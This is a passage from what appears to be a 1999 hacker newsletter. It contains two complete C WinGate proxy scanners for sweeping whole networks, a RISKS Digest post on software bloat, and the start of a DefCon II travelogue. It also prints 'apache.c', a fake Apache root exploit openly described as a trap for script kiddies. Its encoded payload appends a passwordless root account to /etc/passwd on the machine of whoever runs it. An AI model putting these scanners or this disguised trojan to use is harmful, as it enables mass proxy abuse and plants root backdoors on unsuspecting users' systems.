option -File save (from misteri0) -Bug fix and code cleanup Bong bong26@hotmail.com PS: Why make a new code for just 3 lines of code changed, misteri0 ? ****************************************/ #include #include #include #include #include #include #include #include #include #include #include #define SA struct sockaddr #define SIN_LEN sizeof(struct sockaddr_in) #define IPV4_ADDRLEN 16 void ShowHelp(char *); int ConnectCheck(struct sockaddr_in, int),view; FILE *stream; char DestIP[15]; const char *ipv4_ntop(int, const void *, char *, size_t); const char *ipv4_showname(int , const void *, char *, size_t); int main(int argc, char *argv[]) { int i,j,k,c,status,Children=128,Timeout=7,class; char *NetworkID,*num3; struct sockaddr_in DestAddress; if(argc < 3) ShowHelp(argv[0]); NetworkID = argv[1]; num3=argv[2]; class=atoi(num3); while((c = getopt(argc, argv, "vp:c:t:")) != -1) { switch(c) { case 'v': view = 1; break; case 'c': Children = atoi(optarg); break; case 't': Timeout = atoi(optarg); break; } } if(Children < 1) ShowHelp(argv[0]); if(Timeout < 1) ShowHelp(argv[0]); if(class < 1) ShowHelp(argv[0]); if (class > 3) ShowHelp(argv[0]); if (class==1){ fprintf(stderr, "Scanning %s.*.*.*:23 children:%i,timeout:%i\n\n", NetworkID,Children, Timeout); for(k = 1; k < 256; k++) { for(j = 1; j < 256; j++) { for(i = 1; i < Children; i++) { sprintf(DestIP, "%s.%d.%d.%d", NetworkID,k,j, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } for(i = Children + 1; i < 256; i++) { wait(&status); sprintf(DestIP, "%s.%d.%d.%d", NetworkID,k,j,i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } } } } if (class==2){ fprintf(stderr, "Scanning %s.*.*:23 children:%i,timeout:%i\n\n", NetworkID,Children, Timeout); for(j = 1; j < 256; j++) { for(i = 1; i < Children; i++) { sprintf(DestIP, "%s.%d.%d", NetworkID,j,i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } for(i = Children + 1; i < 256; i++) { wait(&status); sprintf(DestIP, "%s.%d.%d", NetworkID,j,i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } } } if (class==3){ fprintf(stderr, "Scanning %s.*:23 children:%i,timeout:%i\n\n", NetworkID,Children, Timeout); DestAddress.sin_family = AF_INET; DestAddress.sin_port = htons(23); for(i = 1; i < Children; i++) { sprintf(DestIP, "%s.%d", NetworkID, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } for(i = Children + 1; i < 256; i++) { wait(&status); sprintf(DestIP, "%s.%d", NetworkID, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } for(;;) { if((waitpid(-1, &status, WNOHANG) == -1) && (errno == ECHILD)) exit(EXIT_SUCCESS); } } } int ConnectCheck(struct sockaddr_in DestAddr, int Timeout) { int result,ret,SocketFD; char Hostname[60],buffer1[64]; if (view==1) printf("%s\n",DestIP); if((SocketFD = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit(EXIT_FAILURE); alarm(Timeout); result = connect(SocketFD, (SA *)&DestAddr, SIN_LEN); if (!result) { alarm(Timeout); memset(buffer1, '\0', 64); if ((ret = read(SocketFD, buffer1, 64)) > 0) { ret = read(SocketFD, buffer1, 64); if(!(memcmp(buffer1, "WinGate>", 8)) || !(memcmp(buffer1, "Too man", 7))) { printf("Wingate found: %s\n\a", ipv4_showname(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59)); stream = fopen("wingatelist.txt","a"); fprintf(stream,"%s\n", ipv4_showname(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59)); fclose(stream); }} close(SocketFD); } exit(EXIT_SUCCESS); } const char * ipv4_ntop(int family, const void *addrptr, char *strptr, size_t len) { const u_char *p = (const u_char *)addrptr; if(family == AF_INET) { char temp[IPV4_ADDRLEN]; snprintf(temp, sizeof(temp), "%d.%d.%d.%d", p[0], p[1], p[2], p[3]); if(strlen(temp) >= len) { return(NULL); } strcpy(strptr, temp); return(strptr); } return(NULL); } const char * ipv4_showname(int family, const void *addrptr, char *strptr, size_t len) { struct hostent *hentry; size_t aflen; if(family == AF_INET) aflen = 4; else { return(NULL); } if((hentry = gethostbyaddr(addrptr, aflen, family)) != NULL) { if(strlen(hentry->h_name) < len) { strcpy(strptr, hentry->h_name); return(strptr); } } return(ipv4_ntop(family, addrptr, strptr, len)); } void ShowHelp(char *argv0) { printf("\nBong Wingate scanner 2.1\n"); printf("Usage: %s [option]\n",argv0); printf("Class: 1 --> A network ID \n"); printf(" 2 --> B network ID \n"); printf(" 3 --> C network ID \n"); printf(" [-c ]\tmaximum simultaneous children\n"); printf(" [-t ] \tseconds before connection timeout\n"); printf(" [-v] \tdebug mode view the IP to scan\n\n"); exit (EXIT_FAILURE); } @HWA 37.0 Gatescan20.c Wingate Scanner by Misteri0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /*************************[GateScan20.C]************************** * Based on the bong's code <-- helped a shitload * * added... * * - cleaned the code up a little bit * * - now logs all wingate servers * * - added the portscanner * * [MAJOR PROPS GO TO:] * * codesearc, ]{ewl, Punk182, Nforcer, bong, S-y-S * * #ehforce@unet, #c@unet, Sslash, as2r|azz, funkey * * MAJOR thanx to packet storm security for posting this * * up. thanx to SIN(Self Induced Negativity member Hogs_head* * [ANTI PROPS GO TO:[I've got my reasons...]] * * #fts(2) <-- never really liked them :P * * #wicked, Ellison, fuCKfaCe (Don't have many enemies...) * *************************[GateScan20.C]************************** */ #include #include #include #include #include #include #include #include #include #include #include #define HIGH_PORT 1024 #define SA struct sockaddr #define SIN_LEN sizeof(struct sockaddr_in) #define IPV4_ADDRLEN 16 #define cl "[0m" #define mag "[35m" #define cyn "[36m" #define wht "[37m" #define hbl "[1;30m" #define hmag "[1;35m" #define hcyn "[1;36m" #define hwh "[1;37m" void ShowVer(); /* Portscanner */ void portscan(char *the_ip) { struct hostent *scand; struct sockaddr_in scan; int sck; int c, portnum; ShowVer(); printf("Scanning....\n"); for(portnum=1; portnumh_addr, sizeof(scan.sin_addr)); } scan.sin_family = AF_INET; scan.sin_port = htons(portnum); sck = socket(AF_INET, SOCK_STREAM, 0); if(sck < 0){ printf("Socket cannot be established!\n"); } c = connect(sck, (struct sockaddr *)&scan, sizeof(scan)); /* connect the socket */ if(c < 0){ } else{ printf("\t [%s]:%d\n",the_ip,portnum); } shutdown(sck, 2); } close(sck); } void ShowHelp(char *, char *); void ShowVer() { fprintf(stderr, "[%sG%sateScan%s.%sC%s[%smisteri0%s%s@%sunet]]\n",cyn,mag,hbl,cyn,cl,hwh,cl,cyn,cl); } int ConnectCheck(struct sockaddr_in, int, int); const char *ipv4_ntop(int, const void *, char *, size_t); const char *ipv4_showname(int , const void *, char *, size_t); FILE *stream; /* Declare the Ol' FILE STREAM */ int main(int argc, char *argv[]) { int i,j=0,status,Children=128,Timeout=7,Resolve=0,class=0; char DestIP[15],*NetworkID,c,*num3; struct sockaddr_in DestAddress; if(atoi(argv[2])==3) { portscan(argv[1]); } if(argc < 3) ShowHelp(argv[0], ""); NetworkID = argv[1]; num3=argv[2]; class=atoi(num3); opterr = 0; while((c = getopt(argc, argv, "Rp:C:t:")) != -1) { switch(c) { case 'R': Resolve = -1; break; case 'C': Children = atoi(optarg); break; case 't': Timeout = atoi(optarg); break; case '?': ShowHelp(argv[0], "ERROR: unrecognized option"); break; } } if(Children < 1) ShowHelp(argv[0], "ERROR: invalid number of children"); if(Timeout < 1) ShowHelp(argv[0], "ERROR: invalid timeout"); ShowVer(); if (class==1) fprintf(stderr, "Scanning %s.*.*:23 children:%i, timeout:%i\n\n", NetworkID,Children, Timeout); if (class==2) fprintf(stderr, "Scanning %s.*:23 children:%i, timeout:%i\n\n",NetworkID, Children, Timeout); DestAddress.sin_family = AF_INET; DestAddress.sin_port = htons(23); if (class==1){ for(j = 0; j < 256; j++) { for(i = 0; i < Children; i++) { sprintf(DestIP, "%s.%d.%d", NetworkID,j, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve); } for(i = Children + 1; i < 256; i++) { wait(&status); /* wait till a child dies to make another */ sprintf(DestIP, "%s.%d.%d", NetworkID,j, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve); } } } if (class==2){ for(i = 0; i < Children; i++) { sprintf(DestIP, "%s.%d", NetworkID, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve); } for(i = Children + 1; i < 256; i++) { wait(&status); /* wait till a child dies to make another */ sprintf(DestIP, "%s.%d", NetworkID, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve); } for(;;) { if((waitpid(-1, &status, WNOHANG) == -1) && (errno == ECHILD)) exit(EXIT_SUCCESS); } } } int ConnectCheck(struct sockaddr_in DestAddr, int Timeout, int Resolve) { int result,ret,SocketFD; char Hostname[60],buffer1[64]; if((SocketFD = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit (EXIT_FAILURE); alarm(Timeout); result = connect(SocketFD, (SA *)&DestAddr, SIN_LEN); if (!result) { alarm(Timeout); memset(buffer1, '\0', 64); if ((ret = read(SocketFD, buffer1, 64)) > 0) { ret = read(SocketFD, buffer1, 64); if(!(memcmp(buffer1, "WinGate>", 8)) || !(memcmp(buffer1, "Too man", 7))) { stream = fopen("wingatelist.txt","a"); printf("Wingate found: %s\n\a",ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59)); fprintf(stream,"%s\n",ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59)); fclose(stream); }} close(SocketFD); } exit(EXIT_SUCCESS); } const char * ipv4_ntop(int family, const void *addrptr, char *strptr, size_t len) { const u_char *p = (const u_char *)addrptr; if(family == AF_INET) { char temp[IPV4_ADDRLEN]; snprintf(temp, sizeof(temp), "%d.%d.%d.%d", p[0], p[1], p[2], p[3]); if(strlen(temp) >= len) { errno = ENOSPC; return(NULL); } strcpy(strptr, temp); return(strptr); } errno = EAFNOSUPPORT; return(NULL); } const char * ipv4_showname(int family, const void *addrptr, char *strptr, size_t len) { struct hostent *hentry; size_t aflen; if(family == AF_INET) aflen = 4; else { errno = EAFNOSUPPORT; return(NULL); } if((hentry = gethostbyaddr(addrptr, aflen, family)) != NULL) { if(strlen(hentry->h_name) < len) { strcpy(strptr, hentry->h_name); return(strptr); } } return(ipv4_ntop(family, addrptr, strptr, len)); } void ShowHelp(char *argv0, char *ErrMsg) { ShowVer(); printf("v2.0 now includes intergrated portscanner\n"); printf("Based bong's code\n"); printf("Output of wingate servers will be written in wingatelist.txt\n"); printf("Usage: %s [option]\n",argv0); printf(" class: 1 class b network ID \n"); printf(" 2 class c network ID \n"); printf(" 3 portscan the host...\n"); printf(" [-C ]\tmaximum simultaneous children\n"); printf(" [-t ] \tseconds before connection timeout\n\n"); exit (EXIT_FAILURE); } @HWA 38.0 The BloatWare Debate ~~~~~~~~~~~~~~~~~~~~ Date: Sun, 02 May 1999 16:12:13 +0000 >From: main@radsoft.net (RA Downes) Subject: Re: Bloatware Debate (Downes, RISKS-20.35) A certain "Johnny" has written to me from Microsoft because of my posting in RISKS-20.35 about MS bloat. The tone was a thinly disguised threat. In his opening, "Johnny" stated that the "bloat" of MS RegClean was due no doubt to having static links. Discussing the sweeping ramifications of such a statement is unnecessary here. The mind boggles, it is sufficient to state. The MSVC runtime is a mere 250,000 bytes and in fact is not statically linked anyway to MS RegClean, AFAIK [as far as I know]. MS RegClean is an MFC app and will by default use the dynamically linked MFC libraries. And even if its static code links were an overhead here they would add but a small fraction of the total bloat, say 40KB at most. For whatever reason, I decided to download the latest version of MS RegClean >from BHS again and pluck it apart. This is what I found. I have tried - and it has been difficult - to keep subjective comments out of this report. Current Status of RegClean Version 4.1a Build 7364.1 ==================================================== Image Size (Unzipped and ready to run): 837,632 bytes (818KB) ============================================================= (Subjective comment removed.) Import Tables ============= The import section in the PE header. This gives an indication of just how (in)effective the use of Bjarne's C++ has been. In this case, the verdict is: "pretty horrible". A walloping 7,680 bytes are used for the names of the relocatable Win32 imports. These are the actual names of the functions (supposedly) called. MS RegClean does not call most of these functions - they remain because an MFC template was originally used, most likely borrowed from another application, and it was never "cleaned". This is corroborated by what is found among the "Windows resources": over half a dozen standard menus, assorted graphic images, print preview resources, etc. that have nothing to do with the application at hand. Resources ========= Please understand that resources not only bloat an executable with their own size, but with additional reference data, in other words the bloat factor of an unused or bad resource is always somewhat larger than the size of the bloating resource itself. Accelerators ============ Sixteen (16) unused accelerators from an MFC template were found: Copy, New, Open, Print, Save, Paste, "Old Undo", "Old Cut", Help, Context Help, "Old Copy", "Old Insert", Cut, Undo, Page Up, Page Down. MS RegClean uses only one accelerator itself, not listed here. Bitmaps ======= This was a particularly sorry lot. The main bloat here was a splash screen bitmap weighing in (no RLE compression of course) at over 150KB. Further, Ctl32 static library bitmaps were found, meaning MS RegClean is still linking with the old Ctl32v2 static library which was obsolete five years ago and which automatically adds another 41KB to the image size. Cursors ======= Six (6) cursors were found, none of which have anything to do with this application. Dialogs ======= A very messy chapter indeed. MS RegClean walks around with eighteen (18) hidden dialogs, of which only one or at the most two are ever used. The others are just - you took the words out of my mouth - junk. The findings (read it and weep): *) Eleven (11) empty dialogs with the caption "My Page" and the static text "Todo", all identical, all empty, and of course all unused. This is a wonder in and of itself. *) The main "wizard" dialog actually used by the application is left with comment fields to help the programmers reference the right controls in their code (subjective comment removed). *) A "RegClean Options" dialog which AFAIK is never used. *) A "New (Resource)" dialog, probably a part of the development process, just stuffed in the stomach at sew-up time and left there for posterity. *) A "Printing in Progress" dialog. *) A "Print Preview" control bar dialog. Icons ===== MS RegClean has three icons, all with images of 48x48 in 256 colors (of course). The funniest thing here is that the authors of MS RegClean have extracted the default desktop icon from shell32.dll, which is available at runtime as a resident resource anyway and at no image bloat overhead at all, and included it in toto in their executable. Menus ===== MS RegClean has eight (8) menus, at least half of these are simply junk left around by the MFC template. Another menu indicates that the authors of RegClean have in fact worked from an internal Microsoft Registry tool - rather bloated in itself it seems. String Table(s) =============== Actually it need only be one string table, but Microsoft itself has never learned this. The findings here were atrocious. And you must remember that strings stored in a string table are stored in Unicode, which means that their bloat automatically doubles. Further, MS's way of indexing strings in a string table means a 512 byte header block must be created for every string grouping, and strings are grouped according to the high 12 bits of their numerical identifiers (yes they are 16-bit WORD identifiers). Meaning indiscriminate or random numbering of string table entries will make an otherwise innocent application literally explode. 347 (three hundred forty seven, yep, your video driver is not playing tricks on you) string table entries were found in MS RegClean, including 16 identical string entries with the MS classic "Open this document" as well as archaic MFC template toggle keys texts which are not used here (or almost anywhere else today). Most of these strings have - of course - nothing to do with the application at hand. Toolbars ======== Toolbars are a funny MS way of looking at glyph bitmaps for use in toolbar controls. MS RegClean has two - one which may be used by the application, and one which was part of the original MFC template and never removed. Total Accountable Resource Bloat ================================ The total accountable (i.e. what can be directly calculated at this stage) resource bloat of MS RegClean 4.1a Build 7364.1 is over 360,000 bytes (350KB). Total Accountable Code Bloat ============================ Harder to estimate, but considering that most of the code is never used, only part of an MFC template that the authors of MS RegClean lack the wherewithal to remove, the original estimate of a total necessary image size of 45KB for the entire application must still stand. In Conclusion ============= Bloat is not a technical issue, but verily a way of thinking, a "state of mind". Its cure is a simple refusal to accept, and a well directed, resounding "clean up your act and clean up your code!" PS. Send feedback on RegClean to regclean@microsoft.com RA Downes, Radsoft Laboratories http://www.radsoft.net ------------------------------ Date: Mon, 03 May 1999 01:46:36 +0000 >From: main@radsoft.net (RA Downes) Subject: Re: Bloatware Debate Bloatware is something we are very sensitized to here. The way we see it, there is no excuse, because there is no reason. I personally accepted Brian W. Kernighan's calculations back in the old days about a 10% bloat with C versus assembler because the rewards were tangible and far outweighed the bloat: you got largely (according to Steve Johnson 94%) platform independent code, saving countless man-hours of work. But ever since the popular inception of MS Windows and furthermore MS's MFC things have been way out of control. This is partly due to C++ and partly, if not largely, due to MS and their MFC itself. A typical Win16 application was 5KB, yet the same skeleton if built with the MFC back then was ten times that size. And Bjarne's words echoed in your ear: "C++ produces no noticeable overhead versus C." It simply was not so, and never will be so. With time the MFC overhead has been reduced somewhat, but programmers of today, raised on OO and C++ as opposed to what others have gone through, are simply not taught to be conservative and minimalistic. I received a letter yesterday from someone who had been reading the Risks Digest, and reported on a party he had attended some years earlier. The conversation turned inevitably toward software, and he mentioned that he often must really tweak code to get it compact and fast. Another person at the party, from you guessed it Redmond Washington, said that was *not* the way things were done there; she said that if they ever ran into performance problems, they just "threw more hardware at it." So there are several issues involved all at once, and AFAIK the only way to fight this, for stop it we must, is to expose it and make even ordinary end users understand what it's all about, and perhaps by a concerted effort we can turn back the tide. Rick Downes, Radsoft Laboratories http://www.radsoft.net ------------------------------ From Risks Digest 20.37 http://catless.ncl.ac.uk/Risks/20.37.html ftp.sri.com/risks/ @HWA 39.0 apache.c claims to be a root exploit but actually creates a shell on your box ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Burn a script kiddie; /* remote apache 1.3.4 root exploit (linux) */ #include #include #include #include #include #include #include char shellcode[] = \ "\x65\x63\x68\x6f\x20\x68\x61\x6b\x72\x3a\x3a\x30\x3a" "\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20" "\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"; #define NOP 0x90 #define BSIZE 256 #define OFFSET 400 #define ADDR 0xbffff658 #define ASIZE 2000 int main(int argc, char *argv[]) { char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2) { printf("%s \n", argv[0]); exit(1); } buffer = (char *) malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memory\n"); exit(1); } memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode, strlen(shellcode)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = '\0'; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("no such server\n"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socket\n"); exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refused\n"); exit(1); } printf("sending exploit code...\n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("exploit was successful!\n"); else printf("sorry, this site isn't vulnerable\n"); printf("waiting for shell.....\n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", shellcode, 0); else wait(NULL); while (1) { /* shell */ } } @HWA 40.0 Cyber-Christ meets Lady Luck. Winn Schwartau in Las Vegas (DefCon II) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml DefCon II: Las Vegas Cyber-Christ meets Lady Luck July 22-24, 1994 by Winn Schwartau Las Vegas connotes radically different images to radically different folks. The Rat Pack of Sinatra, Dean Martin and Sammy Davis Jr. elicits up the glistening self-indulgent imagery of Vegas' neon organized crime in the '50's (Ocean's Eleven displayed only minor hacking skills.) Then there's the daily bus loads of elderly nickel slot gamblers from Los Angeles and Palm Springs who have nothing better to do for twenty out of twenty four hours each day. (Their dead hus bands were golf hacks.) Midwesterners now throng to the Mississippi River for cheap gambling. Recreational vehicles of semi-trailor length from East Bullock, Montana and Euclid, Oklahoma and Benign, Ohio clog routes 80 and 40 and 10 to descend with a vengeance upon an asphalt home away from home in the parking lot of Circus Circus. By cultural demand, every Rv'er worth his salt must, at least once in his life, indulge in the depravity of Glitter Gulch. And so they come, compelled by the invisibly insidious derelict attraction of a desert Mecca whose only purpose in life is to suck the available cash from addicted visitor's electronic purses of ATM and VISA cards. (Hacker? Nah . . .) Vegas also has the distinction of being home to the largest of the largest conventions and exhibitions in the world. Comdex is the world's largest computer convention where 150,000 techno- dweebs and silk suited glib techno-marketers display their wares to a public who is still paying off the 20% per annum debt on last year's greatest new electronic gismo which is now rendered thoroughly obsolete. And the Vegas Consumer Electronic Show does for consumer electronics what the First Amendment does for pornography. (Hackers, are we getting close?) In between, hundreds upon hundreds of small conferences and conventions and sales meetings and annual excuses for excess all select Las Vegas as the ultimate host city. Whatever you want, no matter how decadent, blasphemous, illegal or immoral, at any hour, is yours for the asking, if you have cash or a clean piece of plastic. So, it comes as no surprise, that sooner or later, (and it turns out to be sooner) that the hackers of the world, the computer hackers, phone phreaks, cyber-spooks, Information Warriors, data bankers, Cyber-punks, Cypher-punks, eavesdroppers, chippers, virus writers and perhaps the occasional Cyber Christ again picked Las Vegas as the 1994 site for DefCon II. You see, hackers are like everyone else (sort of) and so they, too, decided that their community was also entitled to hold conferences and conventions. DefCon (as opposed to Xmas's HoHoCon), is the premier mid-year hacker extravaganza. Indulgence gone wild, Vegas notwithstanding if previous Cons are any example; but now put a few hundred techno-anarchists together in sin city USA, stir in liberal doses of illicit controlled pharmaceutical substances, and we have a party that Hunter Thompson would be proud to attend. All the while, as this anarchistic renegade regiment marches to the tune of a 24 hour city, they are under complete surveillance of the authorities. Authorities like the FBI, the Secret Service, telephone security . . . maybe even Interpol. And how did the "man" arrive in tow behind the techno-slovens that belong behind bars? They were invited. And so was I. Invited to speak. (Loose translation for standing up in front of hundreds of hackers and being verbally skewered for having an opinion not in 100% accordance with their own.) "C'mon, it'll be fun," I was assured by DefCon's organizer, the Dark Tangent. "Sure fired way to become mutilated monkey meat," I responded. Some hackers just can't take a joke, especially after a prison sentence and no opposite-sex sex. "No really, they want to talk to you . . ." "I bet." It's not that I dislike hackers - on the contrary. I have even let a few into my home to play with my kids. It's just that, so many of antics that hackers have precipitated at other -Cons have earned them a reputation of disdain by all, save those who remember their own non-technical adolescent shenanigans. And I guess I'm no different. I've heard the tales of depraved indifference, hotel hold-ups, government raids on folks with names similar to those who are wanted for pushing the wrong key on the keyboard and getting caught for it. I wanted to see teens and X- generation type with their eyes so star sapphire glazed over that I could trade them for chips at the craps table. Does the truth live up to the fiction? God, I hope so. It'd be downright awful and unAmerican if 500 crazed hackers didn't get into at least some serious trouble. So I go to Vegas because, because, well, it's gonna be fun. And, if I'm lucky, I might even see an alien spaceship. For you see, the party has already begun. I go to about 30 conventions and conferences a year, but rarely if ever am I so Tylonol and Aphrin dosed that I decide to go with a severe head cold. Sympomatic relief notwithstanding I debated and debated, and since my entire family was down with the same ailment I figured Vegas was as good a place to be as at home in bed. If I could survive the four and half hour plane flight without my Eustahian tubes rocketing through my ear drums and causing irreparable damage, I had it made. The flight was made tolerable becuase I scuba dive. Every few minutes I drowned out the drone of the engines by honking uncontrollably like Felix Ungerto without his aspirator. To the chagrin of my outspoken counter surveillance expert and traveling mate, Mike Peros and the rest of the first class cabin, the captain reluctantly allowed be to remain on the flight and not be expelled sans parachute somewhere over Southfork, Texas. Snort, snort. Due to extensive flirting with the two ladies across the aisle, we made the two thousand mile trek in something less than 34 minutes . . . or so it seemed. Time flies took on new meaning. For those who don't know, the Sahara Hotel is the dregs of the Strip. We were not destined for Caesar's or the MGM or any of the new multi-gazillion dollar hotel cum casinos which produce pedestrian stopping extravaganzas as an inducement to suck in little old ladies to pour endless rolls of Washington quarters in mechanical bottomless pits. The Sahara was built some 200 years ago by native slave labor whose idea of plumbing is clean sand and decorators more concerned with a mention in Mud Hut Daily than Architectural Digest. It was just as depressingly dingy and solicitly low class as it was when I forced to spend eleven days there (also with a killer case of the flu) for an extended Comdex computer show. But, hey, for a hacker show, it was top flight. "What hackers?" The desk clerk said when I asked about the show. I explained. Computer hackers: the best from all over the country. "I hear even Cyber Christ himself might appear." Her quizzical look emphasized her pause. Better to ignore a question not understood than to look stupid. "Oh, they'll be fine, We have excellent security." The security people, I found out shortly thereafter knew even less: "What's a hacker?" Too much desert sun takes its toll. Proof positive photons are bad for neurons. Since it was still only 9PM Mike and I sucked down a couple of $1 Heinekens in the casino and fought it out with Lineman's Switching Union representatives who were also having their convention at the Sahara. Good taste in hotels goes a long way. "$70,000 a year to turn a light from red to green?" we complained. "It's a tension filled job . . .and the overtime is murder." "Why a union?" "To protect our rights." "What rights?" "To make sure we don't get replaced by a computer . . ." "Yeah," I agreed. "That would be sad. No more Amtrak disasters." The crowd got ugly so we made a hasty retreat under the scrutiny of casino security to our rooms. Saved. Perhaps if I noticed or had read the original propaganda on DefCon, I might have known that nothing significant was going to take place until the following (Friday) evening I might have missed all the fun. For at around 8AM, my congestion filled cavities and throbbing head was awakened by the sound of an exploding toilet. It's kind of hard to explain what this sounds like. Imagine a toilet flushing through a three megawatt sound system at a Rolling Stones concert. Add to that the sound of a hundred thousand flue victims standing in an echo chamber cleansng their sinuses into a mountain of Kleenex while three dozen football referees blow their foul whistles in unison, and you still won't come close to the sheer cacophonous volume that my Saharan toilet exuded from within its bowels. And all for my benefit. The hotel manager thought I was kidding. "What do you mean exploded?" "Which word do you not understand?" I growled in my early morning sub-sonic voice. "If you don't care, I don't." My bed was floating. Three or maybe 12 inches of water created the damnedest little tidal wave I'd ever seen, and the sight and sound of Lake Meade in room 1487 only exascerbatd the pressing need to relieve myself. I dried my feet on the extra bed linens, worried about electrocution and fell back asleep. It could have been 3 minutes or three hours later - I have no way to know - but my hypnogoic state was rudely interrupted by hotel maintenance pounding at the door with three fully operational muffler- less jack hammers. "I can't open it," I bellowed over the continual roar of my personal Vesuvius Waterfall. "Just c'mon in." The fourteenth floor hallway had to resemble an underwater coral display becuase the door opened ever so slowly.. "Holy Christ!" Choking back what would have been a painful laugh, I somehow said with a smirk, "Now you know what an exploding toilet is like." For, I swear, the next two hours three men whose English was worse than a dead Armadillo attempted to suck up the Nile River from my room and the hallway. Until that very moment in time, I didn't know that hotels were outfitted with vacuum cleaners specifically designed to vacuum water. Perhaps this is a regular event. Everyone who has ever suffered through one bitches about Vegas buffets, and even the hackers steered away from the Sahara's $1.95 "all you can eat" room: "The Sahara's buffet is the worst in town; worse than Circus Circus." But since I had left my taste buds at 37,000 feet along with schrapneled pieces of my inner ear, I sought out sustenance only to keep me alive another 24 hours. By mid afternoon, I had convinced myself that outside was not the place to be. After only eighteen minutes of 120 sidewalk egg- cooking degrees, the hot desert winds took what was left of my breath away and with no functioning airways as it was, I knew this was a big mistake. So, hacker convention, ready or not, here I come. Now, you have to keep in mind that Las Vegas floor plans are designed with a singular purpose in mind. No matter where you need to go, from Point A to Point B or Point C or D or anywhere, the traffic control regulations mandated by the local police and banks require that you walk by a minimum of 4,350 slot machines, 187 gaming tables of various persuasions and no less than 17 bars. have they no remorse? Madison Avenue ad execs tale heed! . So, lest I spend the next 40 years of my life in circular pursuit of a sign-less hacker convention losing every last farthing I inheroted from dead Englishmen, I asked for the their well hidden location at the hotel lobby. "What hackers?" There goes that nasty photon triggered neuron depletion again. "The computer hackers." "What computer hackers. We don't have no stinking hackers . . ." Desk clerk humor, my oxymoron for the week. I tried the name: DefCon II. "Are we going to war?" one ex-military Uzi-wielding guard said recognizing the etymology of the term. "Yesh, it's true" I used my most convincing tone. "The Khasakstanis are coming with nuclear tipped lances riding hundred foot tall horses. Paris has already fallen. Berlin is in ruins. Aren't you on the list to defend this graet land?" "Sure as shit am!" He scampered off to the nearest phone in an effort to be the first on the front lines. Neuron deficiency beyong surgical repair.. I slithered down umpteen hallways and casino aisles lost in the jungleof jingling change. Where the hell are the hackers? "They must be there," another neuron-impoverished Saharan employee said as he pointed towards a set of escalators at the very far end of the casino. All the way at the end of the almost 1/4 mile trek through Sodom and Gonorrhea an 'up' escalator promised to take me to hackerdom. Saved at last. Upstairs. A conference looking area. No signs anywhere, save one of those little black Velcro-like stick-em signs where you can press on white block letters. No Mo Feds I must be getting close. Aha, a maintenance person; I'll ask him. "What hackers? What's DefCon." Back downstairs, through the casino, to the front desk, back through the casino, up the same escalator again. Room One I was told. Room One was empty. Figures. But, at the end of a hallway, past the men's room and the phones, and around behind Room One I saw what I was looking for: a couple of dozen T-shirted, Seattle grunged out kids (read: under 30) sitting at uncovered six foot folding tables hawking their DefCon II clothing, sucking on Heinekens and amusing themselves with widely strewn backpacks and computers and cell phones. I had arrived! * * * * You know, regular old suit and tie conferences could learn a thing or two from Jeff Moss, the man behind DefCon II. No fancy badge making equipment; no $75 per hour union labor built registration desks; no big signs proclaiming the wealth of knowledge to be gained by signing up early. Just a couple of kids with a sheet of paper and a laptop. It turned out I was expected. They handed me my badge and what a badge it was. I'm color blind, but this badge put any psychedelically induced spectral display to shame. In fact it was a close match to the Sahara's mid 60's tasteless casino carpeting which is so chosen as to hide the most disgusting regurgative blessing. But better and classier. The neat thing was, you could (in fact had to) fill out your own badge once your name was crossed off the piece of paper that represented the attendee list. Name: Subject of Interest: E-Mail: Fill it out any way you want. Real name, fake name, alias, handle - it really doesn't matter cause the hacker underground ethic encourages anonymity. "We'd rather not know who you are anyway, unless you're a Fed. Are you a Fed?" A couple of lucky hackers wore the ultimate badge of honor. An "I Spotted A Fed" T-shirt. This elite group sat or lay on the ground watching and scouring the registration area for signs that someone, anyone, was a Fed. They really didn't care or not if you were a Fed - they wanted the free T-shirt and the peer respect that it brought. I'm over 30 (OK, over 35) and more than a few times (OK, a little over 40) I had to vehemently deny being a Fed. Finally Jeff Moss came to the 